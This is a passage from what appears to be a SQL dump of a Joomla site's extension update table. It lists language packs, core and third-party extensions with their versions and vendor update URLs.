CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30403,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30404,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30405,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30406,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30407,3,0,'German CH','','pkg_de-CH','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30408,3,0,'German AT','','pkg_de-AT','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30409,3,0,'German LI','','pkg_de-LI','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30410,3,0,'German LU','','pkg_de-LU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30411,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30412,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30413,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30415,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(30416,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(30417,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(30418,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(30419,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(30420,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(30421,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(30422,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(30423,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(30424,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(30425,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(30426,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(30427,31,0,'Regular Labs - Modules Anywhere','','modulesanywhere','plugin','system',0,'7.13.5','','https://download.regularlabs.com/updates.xml?e=modulesanywhere&type=.xml','https://www.regularlabs.com/modulesanywhere/download',''),(30428,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30429,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30430,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30431,57,0,'French','','pkg_fr-FR','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30432,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30433,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30434,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30435,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30436,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30437,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30438,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30439,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30440,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30441,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30442,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30443,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30444,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30445,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30446,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30447,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30448,57,0,'Persian','','pkg_fa-IR','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30449,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30450,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30451,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30452,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30453,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30454,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30455,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30456,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30457,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30458,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30459,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30460,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30461,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30462,57,0,'German DE','','pkg_de-DE','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30463,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30464,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30465,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30466,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30467,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30468,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30469,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30470,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30471,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30472,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30473,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30474,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30475,57,0,'German CH','','pkg_de-CH','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30476,57,0,'German AT','','pkg_de-AT','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30477,57,0,'German LI','','pkg_de-LI','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30478,57,0,'German LU','','pkg_de-LU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30479,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30480,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30481,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'9.0.2','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/sourcerer/download',''),(30482,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'5.0.0','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-0			\n		',''),(30483,129,0,'JCE 2.9.16','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.16','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-16-released',''),(30484,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.4','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(30485,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(30486,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30487,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30488,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30489,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30490,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30491,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30492,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30493,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30494,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30495,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30496,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30497,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30498,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30499,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30500,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30501,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30502,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30503,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30504,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30505,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30506,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30507,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30508,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30509,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30510,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30511,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30512,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30513,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30514,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30515,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30516,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30517,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30518,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30519,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30520,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30521,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30522,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30523,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30524,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30525,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30526,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30527,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30528,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30529,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30530,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30531,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30532,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30533,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30534,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30535,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30536,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30537,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30538,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30539,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30540,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30541,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30542,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30543,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30544,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30545,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30546,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30547,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30548,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30549,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30550,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30551,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30552,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30553,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30554,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30555,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30556,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30557,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30558,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30559,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30560,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30561,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30562,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30563,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30564,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30565,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30566,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30567,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30568,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30569,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30570,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30571,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30572,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30573,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30574,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30575,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30576,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30577,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30578,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30579,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30580,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30581,3,0,'German','','pkg_de-DE','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30582,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30583,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30584,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30585,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30586,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30587,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30588,3,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(30589,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30590,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30591,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30592,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30593,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30594,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30595,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30596,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30597,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30598,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30599,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30600,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30601,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(30602,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(30603,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(30604,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(30605,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(30606,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(30607,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(30608,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(30609,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(30610,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(30611,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(30612,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(30613,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30614,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30615,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30616,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30617,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30618,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30619,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30620,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30621,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30622,57,0,'English, 